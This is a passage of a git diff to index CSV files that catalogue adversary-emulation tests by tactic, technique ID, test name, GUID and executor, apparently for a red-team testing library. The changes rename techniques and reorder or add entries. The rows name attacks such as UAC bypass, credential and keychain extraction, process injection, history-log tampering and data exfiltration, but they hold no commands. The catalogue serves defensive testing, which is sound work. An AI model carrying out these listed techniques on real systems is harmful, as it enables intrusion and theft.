+collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
+collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
defense-evasion,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
-defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
-defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
-defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
-defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
-defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
-defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
+defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
+defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
+defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -321,8 +357,6 @@ defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f1
defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
-defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
@@ -333,6 +367,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
+defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
@@ -407,7 +443,9 @@ defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf3
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
+defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
+defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -444,6 +482,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer -
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
@@ -657,12 +697,14 @@ execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86
execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
+execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
+execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
@@ -717,36 +759,6 @@ command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
-collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
-collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
-collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
-collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
-collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
-collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
-collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
-collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
-collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
-collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
-collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
-collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
-collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
-collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
-collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
-collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
-collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
-collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
-collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
-collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
-collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
-collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
-collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
-collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
-collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
-collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
-collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index 5e0d0cf0..d5c4b268 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -41,6 +41,13 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
+collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
+collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
+collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
+collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
+collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
@@ -62,9 +69,9 @@ defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,bash
-defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
+defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Lgging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -144,13 +151,6 @@ command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-42
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
-collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
-collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
-collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
-collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
-collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
-collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 099d86f8..e108fcdf 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -41,6 +41,24 @@ persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
+credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
+credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
+credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
+credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
+credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
+credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
+credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
+credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
+collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
+collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
+collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
+collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
+collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
+collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
+collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
@@ -58,8 +76,6 @@ defense-evasion,T1562.001,Disable or Modify Tools,9,Stop and unload Crowdstrike
defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1553.001,Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
-defense-evasion,T1562.003,HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
-defense-evasion,T1562.003,HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1564.001,Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1564.001,Hidden Files and Directories,2,Mac Hidden file,cddb9098-3b47-4e01-9d3b-6f5f323288a9,sh
defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh
@@ -67,6 +83,8 @@ defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ec
defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
+defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
+defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
@@ -143,25 +161,7 @@ command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
-collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
-collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
-collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
-collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
-collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
-collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
-collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
-collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
-collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
-credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
-credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
-credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
